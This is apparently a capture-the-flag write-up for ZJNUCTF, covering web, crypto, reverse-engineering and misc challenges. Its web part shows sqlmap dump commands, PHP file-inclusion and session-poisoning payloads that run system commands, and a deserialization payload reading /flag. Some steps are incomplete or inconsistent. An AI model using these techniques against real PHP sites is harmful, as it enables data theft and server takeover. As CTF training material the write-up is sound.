WEB
1.easy_php
<?php
highlight_file("index.php"); # show this file's source with syntax highlighting
include("flag.php"); # include flag.php
$_aaa = "No No No";
$_bbb = "Welcome";
if($_SERVER["REQUEST_METHOD"]!="POST"){ # die unless the request method is POST
    die("\n"."Welcome to ZJNUCTF!");
}
if(!isset($_POST["flag"])){ # a POST parameter named flag is required
    die ($_aaa);
}
foreach ($_GET as $key => $value){ # loop over the GET parameters
    $$key = $$value;
}
foreach ($_POST as $key => $value){ # loop over the POST parameters
    $$key = $value;
}
if ($_POST["flag"]!==$flag){ # die if the posted flag differs from the variable from flag.php
    die($_aaa);
}
else
{
    echo "This is your flag : ".$flag."\n";
    die($_bbb);
}
?>
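The code analysis is in the comments above. In short, we have to POST a flag, and if it matches the original flag, it is printed.
Reference: https://www.freebuf.com/column/150731.html
This uses a variable overwrite vulnerability: the first foreach assigns the value of $flag to $_bbb, and die($_bbb) then prints the original flag value.
Construct the payload: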
2.Easysql
Nothing much to explain: just run sqlmap on it.
First capture the request with Burp Suite and save it as 2.txt
python2 sqlmap.py -r 2.txt --dbs --thread 5
After one run, I tried sys first and found it was not the right database; the right one is the test database:
python2 sqlmap.py -r 2.txt -D test --tables --thread 5
python2 sqlmap.py -r 2.txt -D test -T flag --columns --thread 5
python2 sqlmap.py -r 2.txt -D test -T flag -C flag --dump --thread 5
3.lfi2rce
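Open the link; it shows a hint:
The hint mentions user.php and phpinfo.php. Visiting each of them, phpinfo.php turns out to be accessible and exposes a whole set of PHP information.
index.php has a file inclusion vulnerability, include($_POST['file']);. By posting a file parameter we can get the source of any file we want. It is used like this: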
file=php://filter/read=convert.base64-encode/resource=user.php
PD9waHANCiAgICBzZXNzaW9uX3N0YXJ0KCk7DQogICAgZWNobyAkX0NPT0tJRVsndXNlciddOw0KICAgICRfU0VTU0lPTlsnbmFtZSddID0gJF9DT09LSUVbJ3VzZXInXTsNCg==
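Base64-decode it to get:
<?php
    session_start();
    echo $_COOKIE['user'];
    $_SESSION['name'] = $_COOKIE['user'];
There is another cookie-based file inclusion vulnerability here. First, analyze the code:
echo $_COOKIE['user'];
This requires us to send a parameter named user, passed as a cookie.
$_SESSION['name'] = $_COOKIE['user'];
This assigns the value passed in the cookie to the session.
First, send an arbitrary value:
A cookie was sent with the value admin.
Then look in phpinfo for the path where the cookie is stored: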
/var/lib/php/sessions
This is the storage path, and the file name format is sess_ + cookie value.
The cookie value can be seen at:
4stodq9feohijqk3jb9dlshjg4
This is the cookie.
So the absolute path where the cookie is stored is: /var/lib/php/sessions/sess_4stodq9feohijqk3jb9dlshjg4
We then use the file inclusion vulnerability in index.php to include the cookie:
bmFtZXxzOjU6ImFkbWluIjs=
==>name|s:5:"admin";
After base64-decoding the returned data, we find the cookie we sent. So we can use this vulnerability to execute PHP commands:
Craft a malicious username:
<?php system("ls"); ?>
bmFtZXxzOjE4OiI8P3BocCBzeXN0ZW0oImxzIikiOw==
==>name|s:18:"<?php system("ls")";
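Here the base64-decoded result differs from the parameter we sent, so it was probably filtered. Looking for a bypass: URL encoding.
Viewing the source shows that our value was stored successfully:
Use the vulnerability again to include the cookie: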
bmFtZXxzOjIyOiI8P3BocCBzeXN0ZW0oImxzIik7ID8+Ijs=
==>name|s:22:"<?php system("ls"); ?>";
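Why does it still not show up? I don't know why either. After agonizing over it for an afternoon, it occurred to me by chance to see what happens without the base64, so: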
file=php://filter/read=convert/resource=/var/lib/php/sessions/sess_28sfnijqudr01hk8smaqkpblq3
That gave the file name; including it through the file inclusion vulnerability yields the flag:
flag{36ab1c89-82fc-4ad6-a459-8af09703d2e7}
4.Babyweb
The source is as follows:
<?php
# flag in /flag
class red
{
    private $filename = 'index.php';
    function __toString()
    {
        return file_get_contents($this->filename);
    }
}
function check($s) { // requires every input character's ASCII value to be between 32 and 125 (so %00 cannot be sent)
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}
if(isset($_GET{'exp'})) {
    $exp = (string)$_GET['exp'];
    if(check($exp)) {
        $obj = unserialize($exp);
        echo $obj;
    }
}
highlight_file(__FILE__);
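It is actually simple: a PHP deserialization vulnerability. The thing to watch out for is that filename here is a private property.
A variable declared private produces two null bytes after serialization. A null byte is normally written as %00, but because check() does not allow %00 in the input, \00 has to be used instead. I didn't know this, so I got stuck.
The PHP script is as follows: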
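<?php
class red
{
    private $filename = '/flag';
}
$a = new red();
echo serialize($a);
?>
The <0x00> here is the null byte; if you copy it directly, the paste stops at that point. In addition, the lowercase s has to be changed to uppercase (an expert said this is a feature of the PHP version).
Sure enough, after that change the submission worked fine. I'm such a noob.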
Crypto
1.hex
Base64-decode it, then load the result into WinHex and the flag shows up.
This gives 666c61677b35306338383535372d653165632d346131302d623439652d3034616130383764303837327d
2.xor
The source is as follows:
key="hello"
flag="*****************************************"
def pad(x,y):
    y=y + (len(x) - len(y)) * chr(len(x) - len(y))
    return y
def xor(x1,x2):
    c=''
    for i in range(len(x1)):
        c=c+chr(ord(x1[i:i+1])^ord(x2[i:i+1]))
    return c
msg=xor(pad(flag,key),flag)
msg=msg.encode()
#msg=b'\x0e\t\r\x0b\x14E\x17\x1dG\x1dGG\t\x1c\x15\x11\x13\t\x15\x15AE\tFG\x11\x11\t\x14\x16\x10\x16EG\x15\x17\x14\x14\x14\x17Y'
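Let's sort out the reasoning:
With the lengths of flag and key fixed, the output of pad is a constant.
xor XORs x1 and x2 character by character.
The inverse of XOR is XOR. pad is run first and produces a value (a string), call it M; M XOR flag gives msg. To recover flag, we only need msg XOR M.
M is a constant once the flag length and the key are fixed, so the challenge is solved.
The script is as follows: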
key="hello"
flag="*****************************************"
def pad(x,y):
    y=y + (len(x) - len(y)) * chr(len(x) - len(y))
    return y
def xor(x1,x2):
    c=''
    for i in range(len(x1)):
        c=c+chr(ord(x1[i:i+1])^ord(x2[i:i+1]))
    return c
msg = b'\x0e\t\r\x0b\x14E\x17\x1dG\x1dGG\t\x1c\x15\x11\x13\t\x15\x15AE\tFG\x11\x11\t\x14\x16\x10\x16EG\x15\x17\x14\x14\x14\x17Y'
msg = msg.decode()
print(xor(pad(flag,key), msg))
flag{a39c9cc-8157-11ea-bc55-0242ac130003}
reverse
1.Signin
Decompile it with IDA; Shift+F12 shows the flag directly.
2.Unpack it with upx on Linux, then decompile it with IDA.
3.RePY
The script is as follows:
enc = [
34, 44, 39, 33, 61,
34, 115, 114, 117, 118,
116, 119, 120, 107, 35,
36, 36, 119, 107, 116,
127, 116, 37, 107, 127,
37, 37, 120, 107, 119,
127, 117, 116, 36, 119,
115, 38, 37, 36, 119,
119, 59]
for i in enc:
    print(chr(i - 1 ^ 71),end='')
#flag{f5632410-edd1-494c-9cc0-1934d15bcd11}
4.Jvav
Decompile with jadx to get the source
package defpackage;
import java.util.Scanner;
/* renamed from: Main */
public class Main {
    public static void main(String[] args) {
        char[] enc = new char[]{'Ƙ', 'ư', 'Ƅ', 'Ɯ', 'Ǭ', 'Ð', 'Ì', 'Ƅ', 'Ƅ', 'Ɣ', 'Ä', 'ƌ', 'à', '´', 'à', 'Ü', 'À', 'ƌ', '´', 'Ð', 'ä', 'Ɛ', 'À', '´', 'à', 'ä', 'Ô', 'à', '´', 'Ô', 'Ì', 'Ɛ', 'Ä', 'À', 'Ø', 'à', 'ä', 'à', 'à', 'Ð', 'à', 'Ǵ'};
        String str = new String();
        System.out.print("Please input the flag: ");
        str = new Scanner(System.in).nextLine();
        if (str.length() != 42) {
            System.out.println("Wrong!");
            return;
        }
        for (int i = 0; i < 42; i++) {
            if ((((str.charAt(i) << 3) + 1) >> 1) != enc[i]) {
                System.out.println("Wrong!");
                return;
            }
        }
        System.out.println("Right!");
    }
}
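The key part is the final for loop: each flag character is shifted left by 3 bits, 1 is added, and the result is shifted right by 1 bit. I don't really understand what shifting is; just reverse it in Java.
Java script: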
public class a1 {
    public static void main(String[] args) {
        char[] enc = new char[]{'Ƙ', 'ư', 'Ƅ', 'Ɯ', 'Ǭ', 'Ð', 'Ì', 'Ƅ', 'Ƅ', 'Ɣ', 'Ä', 'ƌ', 'à', '´', 'à', 'Ü', 'À', 'ƌ', '´', 'Ð', 'ä', 'Ɛ', 'À', '´', 'à', 'ä', 'Ô', 'à', '´', 'Ô', 'Ì', 'Ɛ', 'Ä', 'À', 'Ø', 'à', 'ä', 'à', 'à', 'Ð', 'à', 'Ǵ'};
        for (int i = 0; i < 42; i++) {
            System.out.print(((enc[i] << 1) - 1) >> 3);
            System.out.print(',');
        }
        System.out.println("Right!");
    }
}
This gives a string of numbers:
101,107,96,102,122,51,50,96,96,100,48,98,55,44,55,54,47,98,44,51,56,99,47,44,55,56,52,55,44,52,50,99,48,47,53,55,56,55,55,51,55,124
These are probably ASCII codes, so convert them with Python:
list = [101,107,96,102,122,51,50,96,96,100,48,98,55,44,55,54,47,98,44,51,56,99,47,44,55,56,52,55,44,52,50,99,48,47,53,55,56,55,55,51,55,124]
for i in list:
    print(chr(i),end='')
But the result is wrong:
ek`fz32``d0b7,76/b,38c/,7847,42c0/5787737|
Change the code to use i+1 and it comes out right:
list = [101,107,96,102,122,51,50,96,96,100,48,98,55,44,55,54,47,98,44,51,56,99,47,44,55,56,52,55,44,52,50,99,48,47,53,55,56,55,55,51,55,124]
for i in list:
    print(chr(i+1),end='')
flag{43aae1c8-870c-49d0-8958-53d106898848}
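Why the +1 was needed, shown as an added example that is not part of the original write-up: the check ((c << 3) + 1) >> 1 is just 4*c, so the Java inverse ((e << 1) - 1) >> 3 lands on c - 1, while e >> 2 inverts it exactly. ENC is the table from the decompiled Main above; the function names are chosen here for illustration.

```python
# enc[] from the decompiled Main on this page, written as one string.
ENC = "ƘưƄƜǬÐÌƄƄƔÄƌà´àÜÀƌ´ÐäƐÀ´àäÔà´ÔÌƐÄÀØàäààÐàǴ"


def check_transform(c):
    """What Main applies to each input char. 8c+1 is odd, so halving floors to 4c."""
    return ((c << 3) + 1) >> 1


def writeup_inverse(e):
    """The inverse used in the Java script above: (2e - 1) >> 3."""
    return ((e << 1) - 1) >> 3


def exact_inverse(e):
    """Undo the multiplication by 4 directly."""
    return e >> 2


def decode(enc, inverse):
    """Apply an inverse function to every code point of enc."""
    return "".join(chr(inverse(ord(ch))) for ch in enc)


def writeup_inverse_is_off_by_one():
    """For e = 4c: (8c - 1) >> 3 floors to c - 1 for every ASCII c."""
    return all(writeup_inverse(check_transform(c)) == c - 1 for c in range(128))


if __name__ == "__main__":
    print(decode(ENC, writeup_inverse))   # the shifted-by-one string
    print(decode(ENC, exact_inverse))     # the flag
    print(writeup_inverse_is_off_by_one())
```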
5.Sharpener
// test.Program
// Token: 0x06000002 RID: 2 RVA: 0x000020D0 File Offset: 0x000002D0
private static void Main(string[] args)
{
    string[] enc = new string[]
    {
        "61894b21be75260c4964065b1eecec4d",
        "3cd02adb6df3f967c3acda1705bb86f1",
        "5c04925674920eb58467fb52ce4ef728",
        "ffbb466329361588defb5e30e5df168f",
        "448804aefe27492b9c183351328e7500",
        "598f5f04d65b4e0e35515b367763fee6",
        "d4398f22c157274df2d4643884db6a56",
        "37afcb75609159217c5548ed91c0ba1b",
        "28cb510090e7e926daa92745a8b02362",
        "49f01756d2edd088b64afd670400f4ac",
        "9f396fe44e7c05c16873b05ec425cbad",
        "958be1aac9d0641822a4dbaa3ad9010f",
        "82c89ed04868c75db962bb3bbe2d4b4c",
        "36f88e7b053afdaff9f9d792d142a406"
    };
    Console.Write("Please input the flag: ");
    string userInput = Console.ReadLine();
    int x = 0;
    int ul = 0;
    string tmp = "";
    if (userInput.Length != 42)
    {
        Console.WriteLine("That Wrong!");
        return;
    }
    for (int i = 0; i < userInput.Length; i++)
    {
        tmp += userInput[i].ToString();
        x++;
        if (x % 3 == 0)
        {
            if (!enc[ul].Equals(Program.GenerateMD5(tmp)))
            {
                Console.WriteLine("That Wrong!");
                return;
            }
            x = 0;
            tmp = "";
            ul++;
        }
    }
    Console.WriteLine("Right!");
}
Crack these MD5 values and concatenate the results to get the flag
flag{b66931c0-ec9f-4d1e-bcff-5673ce3d505b}
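Why hashing the input three characters at a time gives no protection, as an added example that is not part of the original write-up: each digest has only alphabet^3 possible preimages, so a precomputed table reverses every chunk by lookup. It assumes that Program.GenerateMD5 (not shown on the page) is plain MD5 of the chunk rendered as lowercase hex; the function names and ALPHABET are chosen here.

```python
import hashlib
from itertools import product

CHUNK = 3  # Main hashes the input three characters at a time

# enc[] from the decompiled Main on this page
PAGE_ENC = [
    "61894b21be75260c4964065b1eecec4d", "3cd02adb6df3f967c3acda1705bb86f1",
    "5c04925674920eb58467fb52ce4ef728", "ffbb466329361588defb5e30e5df168f",
    "448804aefe27492b9c183351328e7500", "598f5f04d65b4e0e35515b367763fee6",
    "d4398f22c157274df2d4643884db6a56", "37afcb75609159217c5548ed91c0ba1b",
    "28cb510090e7e926daa92745a8b02362", "49f01756d2edd088b64afd670400f4ac",
    "9f396fe44e7c05c16873b05ec425cbad", "958be1aac9d0641822a4dbaa3ad9010f",
    "82c89ed04868c75db962bb3bbe2d4b4c", "36f88e7b053afdaff9f9d792d142a406",
]

# Symbols that can occur in a flag{<uuid>} string: 21 of them.
ALPHABET = sorted(set("flag{}-0123456789abcdef"))


def md5_hex(text):
    # Assumption: GenerateMD5 is plain MD5 of the chunk, as lowercase hex.
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def build_table(alphabet=ALPHABET):
    """Precompute digest -> chunk for every CHUNK-symbol string."""
    return {md5_hex("".join(p)): "".join(p) for p in product(alphabet, repeat=CHUNK)}


def recover(digests, table=None):
    """Look each digest up; digests outside the table come back as None."""
    table = table or build_table()
    return [table.get(d.lower()) for d in digests]


def chunk_digests(text):
    """Reproduce the checker's side: one digest per CHUNK characters."""
    return [md5_hex(text[i:i + CHUNK]) for i in range(0, len(text), CHUNK)]


if __name__ == "__main__":
    print(len(build_table()), "candidates per chunk")
    print(recover(PAGE_ENC))
```

If GenerateMD5 salts or encodes its input differently, the lookups for PAGE_ENC return None and the table has to be rebuilt with the matching hash routine.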
6.Bytecoding
This challenge is kind of interesting: what we get is a text file with the following content:
3 0 LOAD_CO
56 LOAD_CONST 12 (44)
58 LOAD_CONST 1 (101)
60 LOAD_CONST 14 (48)
62 LOAD_CONST 15 (53)
64 LOAD_CONST 7 (98)
66 LOAD_CONST 9 (51)
68 LOAD_CONST 11 (56)
70 LOAD_CONST 18 (99)
72 LOAD_CONST 1 (101)
74 LOAD_CONST 15 (53)
76 LOAD_CONST 7 (98)
78 LOAD_CONST 7 (98)
80 LOAD_CONST 7 (98)
82 LOAD_CONST 19 (124)
84 BUILD_LIST 42
86 STORE_FAST 0 (enckey)
4 88 LOAD_GLOBAL 0 (input)
90 LOAD_CONST 20 ('GoGoGo Input Flag: ')
92 CALL_FUNCTION 1
94 STORE_FAST 1 (inpt)
5 96 LOAD_GLOBAL 1 (len)
98 LOAD_FAST 1 (inpt)
100 CALL_FUNCTION 1
102 LOAD_CONST 21 (42)
104 COMPARE_OP 3 (!=)
106 POP_JUMP_IF_FALSE 120
6 108 LOAD_GLOBAL 2 (print)
110 LOAD_CONST 22 ('Wrong')
112 CALL_FUNCTION 1
114 POP_TOP
7 116 LOAD_CONST 0 (None)
118 RETURN_VALUE
8 >> 120 SETUP_LOOP 52 (to 174)
122 LOAD_GLOBAL 3 (range)
124 LOAD_CONST 21 (42)
126 CALL_FUNCTION 1
128 GET_ITER
>> 130 FOR_ITER 40 (to 172)
132 STORE_FAST 2 (i)
9 134 LOAD_FAST 0 (enckey)
136 LOAD_FAST 2 (i)
138 BINARY_SUBSCR
140 LOAD_GLOBAL 4 (ord)
142 LOAD_FAST 1 (inpt)
144 LOAD_FAST 2 (i)
146 BINARY_SUBSCR
148 CALL_FUNCTION 1
150 LOAD_CONST 23 (1)
152 BINARY_SUBTRACT
154 COMPARE_OP 3 (!=)
156 POP_JUMP_IF_FALSE 130
10 158 LOAD_GLOBAL 2 (print)
160 LOAD_CONST 22 ('Wrong')
162 CALL_FUNCTION 1
164 POP_TOP
11 166 LOAD_CONST 0 (None)
168 RETURN_VALUE
170 JUMP_ABSOLUTE 130
>> 172 POP_BLOCK
12 >> 174 LOAD_GLOBAL 2 (print)
176 LOAD_CONST 24 ('Right')
178 CALL_FUNCTION 1
180 POP_TOP
182 LOAD_CONST 0 (None)
184 RETURN_VALUE
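At first I thought this was assembly, but it is actually Python bytecode.
After reading through it, I could just barely understand part of it.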
0 LOAD_CO
56 LOAD_CONST 12 (44)
58 LOAD_CONST 1 (101)
60 LOAD_CONST 14 (48)
62 LOAD_CONST 15 (53)
64 LOAD_CONST 7 (98)
66 LOAD_CONST 9 (51)
68 LOAD_CONST 11 (56)
70 LOAD_CONST 18 (99)
72 LOAD_CONST 1 (101)
74 LOAD_CONST 15 (53)
76 LOAD_CONST 7 (98)
78 LOAD_CONST 7 (98)
80 LOAD_CONST 7 (98)
82 LOAD_CONST 19 (124)
84 BUILD_LIST 42
86 STORE_FAST 0 (enckey)
The first block should be an array (list) containing the values ['101','107','96','102','122','49','98','47','96','101','51','52','56','44','54','98','96','48','44','51','96','51','53','44','97','55','48','54','44','101','48','53','98','51','56','99','101','53','98','98','98','124'].
88 LOAD_GLOBAL 0 (input)
90 LOAD_CONST 20 ('GoGoGo Input Flag: ') inpt=input("GoGoGo Input Flag:")
92 CALL_FUNCTION 1
94 STORE_FAST 1 (inpt)
Decompiled, the second block should be a single statement: inpt=input("GoGoGo Input Flag:")
96 LOAD_GLOBAL 1 (len)
98 LOAD_FAST 1 (inpt)
100 CALL_FUNCTION 1
102 LOAD_CONST 21 (42)
104 COMPARE_OP 3 (!=)
106 POP_JUMP_IF_FALSE 120
108 LOAD_GLOBAL 2 (print)
110 LOAD_CONST 22 ('Wrong')
112 CALL_FUNCTION 1
114 POP_TOP
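The third and fourth blocks are roughly
if len(inpt) != 42:
    print("wrong")
After that I couldn't really follow it. Roughly, inpt and enckey go through some computation and must satisfy some condition for right to be printed.
I noticed that the ASCII code of f is 102 and the first value of enckey is 101, so let's see what comes out when 1 is added to each value.
The script: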
list=['101','107','96','102','122','49','98','47','96',
'101','51','52','56','44','54','98','96','48','44','51',
'96','51','53','44','97','55','48','54','44','101','48',
'53','98','51','56','99','101','53','98','98','98','124']
for i in list:
    print(chr(int(i)+1),end='')
flag{2c0af459-7ca1-4a46-b817-f16c49df6ccc}
This is just too magical.
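The +1 can be read straight off the listing instead of guessed, shown here as an added example that is not part of the original write-up: the rows at offsets 134 to 154 compare enckey[i] with ord(inpt[i]) - 1. The small parser below (its names are chosen here) rebuilds the list from the LOAD_CONST/BUILD_LIST rows and undoes the BINARY_SUBTRACT; because the listing on the page is cut off before offset 56, it recovers only the tail of the flag.

```python
import re

# Rows copied from the listing on this page. The page's copy is cut off before
# offset 56, so only the last 14 of the 42 list elements are available.
LISTING = """\
56 LOAD_CONST 12 (44)
58 LOAD_CONST 1 (101)
60 LOAD_CONST 14 (48)
62 LOAD_CONST 15 (53)
64 LOAD_CONST 7 (98)
66 LOAD_CONST 9 (51)
68 LOAD_CONST 11 (56)
70 LOAD_CONST 18 (99)
72 LOAD_CONST 1 (101)
74 LOAD_CONST 15 (53)
76 LOAD_CONST 7 (98)
78 LOAD_CONST 7 (98)
80 LOAD_CONST 7 (98)
82 LOAD_CONST 19 (124)
84 BUILD_LIST 42
86 STORE_FAST 0 (enckey)
150 LOAD_CONST 23 (1)
152 BINARY_SUBTRACT
154 COMPARE_OP 3 (!=)
"""

# [source line] [>>] offset OPNAME [raw arg] [(argrepr)]
ROW = re.compile(r"^\s*(?:\d+\s+)?(?:>>\s+)?\d+\s+([A-Z_]+)(?:\s+(\d+))?(?:\s+\((.*)\))?\s*$")

def rows(listing):
    """Yield (opname, raw_arg, argrepr) for each row that parses."""
    for line in listing.splitlines():
        m = ROW.match(line)
        if m:
            yield m.groups()

def recover(listing, name="enckey"):
    """Rebuild the list stored in `name` and undo the `ord(c) - k` comparison."""
    consts, built, lists, k = [], None, {}, 0
    for op, raw, rep in rows(listing):
        if op == "LOAD_CONST" and rep and rep.isdigit():
            consts.append(int(rep))
        elif op == "BUILD_LIST":   # takes the top n stack items
            built, consts = consts[max(0, len(consts) - int(raw)):], []
        elif op == "STORE_FAST" and built is not None:
            lists[rep], built = built, None
        elif op == "BINARY_SUBTRACT" and consts:
            k = consts.pop()       # check is enckey[i] != ord(inpt[i]) - k
    return "".join(chr(v + k) for v in lists[name])
```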
Misc
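1.Sign-in challenge
Follow the official account and reply zjnuctf to get the flag
2.Real sign-in
The download is a Word document; turn on hidden text to see the flag.
3.Do you know Han Xin Code?
Find the four corners online and stitch them on to get the image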
4.Keyboard
References:
https://www.cnblogs.com/hackxf/p/10670844.html
https://blog.csdn.net/qq_36609913/article/details/78578406
First run the following command on Linux:
tshark -r keyboard.pcapng -T fields -e usb.capdata > usbdata.txt
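This gives a bunch of numbers:
Each line has 16 hex digits; every two digits form one byte, so there are 8 bytes. The 3rd byte is the key that was pressed on the keyboard.
The lookup table is as follows: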
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":":","34":"\"","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
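After looking at that position, look at the first digit: it is sometimes 0 and sometimes 2. My blind guess is that a first digit of 2 means the Shift key is held down. Checking this, the first few characters come out as exactly flag{
Build the script: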
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":":","34":"\"","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
flag=''
f = open('usbdata.txt','r')
for i in range(200):
    l = f.readline()
    if not l: # end of file reached
        break
    if l[4:6] == '00': # no key pressed in this report
        continue
    elif l[0]=='2': # Shift held
        flag += shiftKeys[l[4:6]]
    elif l[0]=='0':
        flag += normalKeys[l[4:6]]
    else:
        continue
f.close()
print(flag)
#flag{4565fd58-c9b2-4544-86f7-872e38433467}
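Here, because I didn't know how many lines there were, I just ran it a few more times; Python stops automatically at the point where an error occurs.
5.Interesting Minecraft
Open the image in WinHex; at the very end there is a line of base64, which decodes to cnserver.bi0x.cn
Open the game and join.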
flag{22a61e26-6a6c-4130-a39a-15f0ce5c15fc}
6.zip
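The password is UVWHZAITWAU
The image contains four ciphers: the first is MIMIMOYS, the second is the Galactic alphabet, the third is the flag-waving stick figures, and the fourth is the bird totem.
I don't know what the first and fourth are, but that doesn't stop me from brute-forcing.
Originally, matching against the tables gave HZAIYQ for the letters in the middle; the first three and last two characters are blind guesses, so just brute-force them.
The script that generates the dictionary: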
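known='HZAITQ'
alphabet='ABCDEFGHIJKLMNOPQRSTUVWXYZ'
print(len(alphabet))
# "w" so that a rerun does not append duplicates to an old pass.txt
with open("pass.txt","w") as f:
    # three unknown letters in front of the known part, two after it
    for i in alphabet:
        for j in alphabet:
            for k in alphabet:
                for l in alphabet:
                    for m in alphabet:
                        flag=i+j+k+known+l+m
                        f.write(flag+"\n")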
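It ran for quite a while, but the result was wrong. I checked everything carefully again and it was still wrong.
So the mistake had to be in the six known characters. I first guessed that only one of them was wrong and tried six times, which took quite a while, and finally found that of the six known characters the last one was wrong: it is W. orz
Then open the archive to get the flag.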
7.Interesting video
flag:000{w3lc0me_1337_players_and_good_luck_with_the_game}
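This part is Morse code: the code is .-/-./-.., which translates to and
This part is semaphore, which translates to the.
Running it on the Linux command line gives game
In summary: 000{w3lc0me_1337_players_and_good_luck_with_the_game}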